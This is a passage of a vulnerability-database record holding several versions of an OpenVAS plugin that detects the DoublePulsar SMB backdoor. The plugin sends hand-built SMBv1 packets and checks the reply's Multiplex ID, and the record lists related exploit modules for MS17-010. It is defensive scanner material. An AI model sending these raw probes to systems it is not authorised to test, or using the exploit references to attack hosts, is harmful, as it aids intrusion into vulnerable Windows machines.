not, the system will respond with a \"Not 
Implemented\" message.\nif(smb_trans2_resp && (ord(smb_trans2_resp[9])==2 && ord(smb_trans2_resp[10])==0\n && ord(smb_trans2_resp[11])==0 && ord(smb_trans2_resp[12])==192))\n{\n ##As part of the message, a \"Multiplex ID\" is returned.\n ##For normal systems it is 65 (0x41) and for infected systems it is 81 (0x51).\n if(ord(smb_trans2_resp[34]) == 81)\n {\n security_message(port:smbPort );\n close(soc);\n exit(0);\n }\n}\nclose(soc);\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["references", "modified", "sourceData"], "edition": 5, "lastseen": "2018-09-01T23:40:40"}, {"bulletin": {"id": "OPENVAS:1361412562310810698", "hash": "fed1fbf7c72b82723554d03c9eca63d8211b31095941cfb5fb17d4594e4bed89", "type": "openvas", "bulletinFamily": "scanner", "title": "Double Pulsar Infection Detect", "description": "This host is vulnerable to ", "published": "2017-04-18T00:00:00", "modified": "2019-05-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810698", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://technet.microsoft.com/library/security/MS17-010", "https://github.com/countercept/doublepulsar-detection-script", "http://blog.binaryedge.io/2017/04/21/doublepulsar", "https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312"], "cvelist": ["CVE-2017-0147", "CVE-2017-0146"], "lastseen": "2019-05-06T14:28:51", "history": [], "viewCount": 34, "enchantments": {"dependencies": {"modified": "2019-05-06T14:28:51", "references": [{"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": 
["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["CVE-2017-0147", "CVE-2017-0146"], "type": "cve"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MS17_010"], "type": "canvas"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["SMNTC-96709", "SMNTC-96707"], "type": "symantec"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810698", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Double Pulsar Infection Detect\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n# Antu Sanadi <santu@secpod.com> on 2017-06-28Fixed the validation issues.\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810698\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_cve_id(\"CVE-2017-0146\", \"CVE-2017-0147\");\n script_bugtraq_id(96707, 96709);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-04-18 15:25:17 +0530 (Tue, 18 Apr 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_name(\"Double Pulsar Infection Detect\");\n\n script_tag(name:\"summary\", value:\"This host is vulnerable to 'Eternalblue'\n tool attack and is prone to remote code-execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send an SMB trans2 session setup request\n and 
check for presence of Multiplex ID '0x51' in the response.\");\n\n script_tag(name:\"insight\", value:\"An SMBv1 (Server Message Block 1.0) exploit\n that could trigger a RCE in older versions of Windows dubbed as 'ETERNALBLUE'\n has been discovered in latest dump of NSA Tools. One covert channel, 'double\n pulsar', is designed to particular for systems that are vulnerable to Eternalblue.\n The covert channel uses SMB features that have so far been not used, in\n particular, the 'Trans2' feature.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code on the affected system. Failed attacks\n will cause denial of service conditions.\");\n\n script_tag(name:\"affected\", value:\"All Windows Platforms from Windows XP\n through Windows 2012\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://github.com/countercept/doublepulsar-detection-script\");\n script_xref(name:\"URL\", value:\"https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312\");\n script_xref(name:\"URL\", value:\"http://blog.binaryedge.io/2017/04/21/doublepulsar\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_smb_version_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"smb_v1/supported\", \"Host/runs_windows\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\nname = kb_smb_name();\nsmbPort = kb_smb_transport();\nif(!name || !smbPort){\n exit(0);\n}\n\nsoc = open_sock_tcp( smbPort );\nif( ! 
soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42,\n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x53, 0xc0,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe,\n 0x00, 0x00, 0x40, 0x00, 0x00, 0x62, 0x00, 0x02,\n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f,\n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52,\n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02,\n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e,\n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f,\n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57,\n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70,\n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02,\n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30,\n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41,\n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54,\n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32,\n 0x00);\n\n## SMB Negotiate Protocol Response\nsend( socket:soc, data:smb_neg_req );\nsmb_neg_resp = smb_recv( socket:soc );\nif(strlen(smb_neg_resp) < 9 || !ord(smb_neg_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n\n## SMB Session Setup AndX Request,Anonymous User\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0x88, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xc0,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe,\n 0x00, 0x00, 0x40, 0x00, 0x0d, 0xff, 0x00, 0x88,\n 0x00, 0x04, 0x11, 0x0a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0xd4, 0x00, 0x00, 0x00, 0x4b,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x57, 0x00,\n 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00,\n 0x77, 0x00, 0x73, 0x00, 0x20, 0x00, 0x32, 0x00,\n 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x31, 0x00, 0x39, 0x00, 0x35, 0x00,\n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 
0x00, 0x30, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x20, 0x00, 0x35, 0x00, 0x2e, 0x00,\n 0x30, 0x00, 0x00, 0x00);\n\n## Session Setup AndX Response\nsend( socket:soc, data:smb_sess_req );\nsmb_sess_resp = smb_recv( socket:soc );\nif(strlen(smb_sess_resp) < 9 || !ord(smb_sess_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif(smb_sess_resp)\n{\n uid_low = ord(smb_sess_resp[32]);\n uid_high = ord(smb_sess_resp[33]);\n uid = uid_high * 256;\n uid += uid_low;\n}\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif(strlen(smb_tree_resp) < 9 || !ord(smb_tree_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract Tree ID from SMB Tree Connect Response\nif(smb_tree_resp)\n{\n tid_low = ord(smb_tree_resp[28] );\n tid_high = ord(smb_tree_resp[29] );\n}\n\n## SMB TRANS2 Request\nsmbtrans2_request = raw_string(0x00, 0x00, 0x00, 0x4e, 0xff, 0x53, 0x4d, 0x42,\n 0x32, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xc0,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00) + raw_string(tid_low, tid_high) +\n raw_string(0xff, 0xfe) + raw_string(uid_low, uid_high) +\n raw_string(0x41, 0x00, 0x0f, 0x0c, 0x00, 0x00,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xa6, 0xd9, 0xa4, 0x00, 0x00, 0x00, 0x0c,\n 0x00, 0x42, 0x00, 0x00, 0x00, 0x4e, 0x00, 0x01,\n 0x00, 0x0e, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00 );\n\nsend( socket:soc, data: smbtrans2_request);\n\n##Trans2 Response, SESSION_SETUP, Error: STATUS_NOT_IMPLEMENTED\nsmb_trans2_resp = smb_recv( socket:soc );\nif(strlen(smb_trans2_resp) < 34)\n{\n close( soc );\n exit( 0 );\n}\n\n##The intent of this request is to check if the system is already compromised.\n##Infected or not, the system will respond with a \"Not Implemented\" message.\nif(smb_trans2_resp && (ord(smb_trans2_resp[9])==2 && 
ord(smb_trans2_resp[10])==0\n && ord(smb_trans2_resp[11])==0 && ord(smb_trans2_resp[12])==192))\n{\n ##As part of the message, a \"Multiplex ID\" is returned.\n ##For normal systems it is 65 (0x41) and for infected systems it is 81 (0x51).\n if(ord(smb_trans2_resp[34]) == 81)\n {\n security_message(port:smbPort );\n close(soc);\n exit(0);\n }\n}\nclose(soc);\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["cvss"], "edition": 7, "lastseen": "2019-05-06T14:28:51"}, {"bulletin": {"id": "OPENVAS:1361412562310810698", "hash": "f965112c99785f13cf6356b9533ba7406843424d7437cad6ab973f774d3e537d", "type": "openvas", "bulletinFamily": "scanner", "title": "Double Pulsar Infection Detect", "description": "This host is vulnerable to ", "published": "2017-04-18T00:00:00", "modified": "2017-10-24T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810698", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://github.com/countercept/doublepulsar-detection-script", "http://blog.binaryedge.io/2017/04/21/doublepulsar", "https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312"], "cvelist": ["CVE-2017-0147", "CVE-2017-0146"], "lastseen": "2017-10-25T14:48:43", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810698", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_doublepulsar_infection_detect.nasl 7543 2017-10-24 11:02:02Z cfischer $\n#\n# Double Pulsar Infection Detect\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n# Antu Sanadi <santu@secpod.com> on 2017-06-28Fixed the validation issues.\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free 
software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810698\");\n script_version(\"$Revision: 7543 $\");\n script_cve_id(\"CVE-2017-0146\", \"CVE-2017-0147\");\n script_bugtraq_id(96707, 96709);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-24 13:02:02 +0200 (Tue, 24 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-18 15:25:17 +0530 (Tue, 18 Apr 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_name(\"Double Pulsar Infection Detect\");\n\n script_tag(name:\"summary\", value:\"This host is vulnerable to 'Eternalblue'\n tool attack and is prone to remote code-execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send an SMB trans2 session setup request\n and check for presence of Multiplex ID '0x51' in the response.\");\n\n script_tag(name:\"insight\", value:\"An SMBv1 (Server Message Block 1.0) exploit\n that could trigger a RCE in older versions of Windows dubbed as 'ETERNALBLUE'\n has been discovered in latest dump of NSA Tools. 
One covert channel, 'double\n pulsar', is designed to particular for systems that are vulnerable to Eternalblue.\n The covert channel uses SMB features that have so far been not used, in\n particular, the 'Trans2' feature.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code on the affected system. Failed attacks \n will cause denial of service conditions.\n\n Impact Level: System/Application\");\n\n script_tag(name:\"affected\", value:\"All Windows Platforms from Windows XP\n through Windows 2012\");\n\n script_tag(name:\"solution\", value:\"Run Windows Update and update the\n listed hotfixes or download and update mentioned hotfixes in the advisory\n from the below link, https://technet.microsoft.com/library/security/MS17-010\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name : \"URL\" , value : \"https://github.com/countercept/doublepulsar-detection-script\");\n script_xref(name : \"URL\" , value : \"https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312\");\n script_xref(name : \"URL\" , value : \"http://blog.binaryedge.io/2017/04/21/doublepulsar\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_smb_version_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"smb_v1/supported\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\n## Variable Initialization\nname = \"\";\nsmbPort = \"\";\nsoc = \"\";\nsmb_neg_req = \"\";\nsmb_neg_resp = \"\";\nsmb_sess_req = \"\";\nsmb_sess_resp = \"\";\nsmb_tree_resp = \"\";\nsmbtrans2_request = \"\";\nsmb_trans2_resp = \"\";\ntid_low = \"\";\ntid_high = \"\";\nuid_low = \"\";\nuid_high = \"\";\nuid = \"\";\n\nname = kb_smb_name();\nsmbPort = kb_smb_transport();\nif(!name || !smbPort){\n 
exit(0);\n}\n\nsoc = open_sock_tcp( smbPort );\nif( ! soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42, \n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x53, 0xc0, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe, \n 0x00, 0x00, 0x40, 0x00, 0x00, 0x62, 0x00, 0x02, \n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f, \n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52, \n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02, \n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e, \n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f, \n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57, \n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70, \n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02, \n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30, \n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41, \n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54, \n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32, \n 0x00);\n\n## SMB Negotiate Protocol Response\nsend( socket:soc, data:smb_neg_req );\nsmb_neg_resp = smb_recv( socket:soc );\nif(strlen(smb_neg_resp) < 9 || !ord(smb_neg_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n\n## SMB Session Setup AndX Request,Anonymous User\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0x88, 0xff, 0x53, 0x4d, 0x42, \n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xc0, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe, \n 0x00, 0x00, 0x40, 0x00, 0x0d, 0xff, 0x00, 0x88, \n 0x00, 0x04, 0x11, 0x0a, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0xd4, 0x00, 0x00, 0x00, 0x4b, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x57, 0x00, \n 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, \n 0x77, 0x00, 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, \n 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x20, 0x00, \n 0x32, 0x00, 0x31, 0x00, 0x39, 0x00, 0x35, 0x00, \n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 
0x6e, 0x00, \n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, \n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, \n 0x30, 0x00, 0x20, 0x00, 0x35, 0x00, 0x2e, 0x00, \n 0x30, 0x00, 0x00, 0x00);\n\n## Session Setup AndX Response\nsend( socket:soc, data:smb_sess_req );\nsmb_sess_resp = smb_recv( socket:soc );\nif(strlen(smb_sess_resp) < 9 || !ord(smb_sess_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif(smb_sess_resp)\n{\n uid_low = ord(smb_sess_resp[32]);\n uid_high = ord(smb_sess_resp[33]);\n uid = uid_high * 256;\n uid += uid_low;\n}\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif(strlen(smb_tree_resp) < 9 || !ord(smb_tree_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract Tree ID from SMB Tree Connect Response\nif(smb_tree_resp)\n{\n tid_low = ord(smb_tree_resp[28] );\n tid_high = ord(smb_tree_resp[29] );\n}\n\n## SMB TRANS2 Request\nsmbtrans2_request = raw_string(0x00, 0x00, 0x00, 0x4e, 0xff, 0x53, 0x4d, 0x42, \n 0x32, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xc0, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00) + raw_string(tid_low, tid_high) +\n raw_string(0xff, 0xfe) + raw_string(uid_low, uid_high) +\n raw_string(0x41, 0x00, 0x0f, 0x0c, 0x00, 0x00, \n 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0xa6, 0xd9, 0xa4, 0x00, 0x00, 0x00, 0x0c, \n 0x00, 0x42, 0x00, 0x00, 0x00, 0x4e, 0x00, 0x01, \n 0x00, 0x0e, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00 );\n\nsend( socket:soc, data: smbtrans2_request);\n\n##Trans2 Response, SESSION_SETUP, Error: STATUS_NOT_IMPLEMENTED\nsmb_trans2_resp = smb_recv( socket:soc );\nif(strlen(smb_trans2_resp) < 34)\n{\n close( soc );\n exit( 0 );\n}\n\n##The intent of this request is to check if the system is already compromised.\n##Infected or not, the system will respond with a \"Not 
Implemented\" message.\nif(smb_trans2_resp && (ord(smb_trans2_resp[9])==2 && ord(smb_trans2_resp[10])==0\n && ord(smb_trans2_resp[11])==0 && ord(smb_trans2_resp[12])==192))\n{\n ##As part of the message, a \"Multiplex ID\" is returned.\n ##For normal systems it is 65 (0x41) and for infected systems it is 81 (0x51).\n if(ord(smb_trans2_resp[34]) == 81)\n {\n security_message(port:smbPort );\n close(soc);\n exit(0);\n }\n}\nclose(soc);\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2017-10-25T14:48:43"}], "viewCount": 240, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0147"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96707"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "trendmicroblog", "idList": 
["TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "saint", "idList": ["SAINT:8F97D6443E5FED252FF64CE37A74709D", "SAINT:2D677AA07C3BC24D8037E937830ACA0D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0147"]}, {"type": "securelist", "idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"]}, {"type": "canvas", "idList": ["MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2019-05-29T18:33:53", "rev": 2}, "score": {"value": 9.3, "vector": "NONE", "modified": "2019-05-29T18:33:53", "rev": 2}}, "objectVersion": "1.5", "pluginID": "1361412562310810698", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Double Pulsar Infection Detect\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n# Antu Sanadi <santu@secpod.com> on 